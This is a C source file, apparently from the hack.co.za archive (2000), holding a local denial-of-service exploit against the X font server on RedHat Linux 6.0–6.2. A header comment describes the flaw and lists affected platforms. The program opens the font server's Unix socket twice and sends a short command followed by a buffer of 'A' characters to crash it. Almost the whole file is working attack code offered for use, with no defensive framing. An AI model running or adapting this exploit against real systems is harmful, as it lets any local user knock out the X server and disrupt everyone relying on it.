/*
 
   Due to improper input validation (NULL
   pointer occours on strcpy()), any user
   may crash X fontserver under RedHat 6.x,
   causing effective DoS for whole X server :)
 
         Michal Zalewski [lcamtuf@tpi.pl]
 
 Affected:
 
   RedHat Linux 6.2 sparc
   RedHat Linux 6.2 i386
   RedHat Linux 6.2 alpha
   RedHat Linux 6.1 sparc
   RedHat Linux 6.1 i386
   RedHat Linux 6.1 alpha
   RedHat Linux 6.0 sparc
   RedHat Linux 6.0 i386
   RedHat Linux 6.0 alpha
 
*/

#include <sys/socket.h>
#include <sys/un.h>

#define CNT 50
#define FS "/tmp/.font-unix/fs-1"

int s,y;
struct sockaddr_un x;

char buf[CNT];

main()
{
  for (y;y<2;y++)
    {
      s=socket(PF_UNIX,SOCK_STREAM,0);
      x.sun_family=AF_UNIX;
      strcpy(x.sun_path,FS);
      if (connect(s,&x,sizeof(x)))
        {
          perror(FS);
          exit(1);
        }
      if (!y) write(s,"lK",2);
      memset(buf,'A',CNT);
      write(s,buf,CNT);
      shutdown(s,2);
      close(s);
    }
}
/*                    www.hack.co.za              [2000]*/